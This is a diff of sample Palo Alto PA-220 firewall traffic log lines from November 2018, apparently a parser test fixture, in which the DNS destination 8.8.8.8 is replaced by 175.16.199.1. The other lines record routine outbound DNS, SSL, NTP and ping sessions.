16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,66.28.0.45,192.168.1.63,66.28.0.45,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,23.52.174.25,192.168.1.63,23.52.174.25,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,54.230.5.228,192.168.1.63,54.230.5.228,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,208.83.246.20,192.168.1.63,208.83.246.20,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United 
States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,35.185.88.112,192.168.1.63,35.185.88.112,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 
16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 
@@ -91,10 +91,10 @@ Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/
 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.6.117.19,192.168.1.63,52.6.117.19,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,34.238.96.22,192.168.1.63,34.238.96.22,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,130.211.47.17,192.168.1.63,130.211.47.17,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
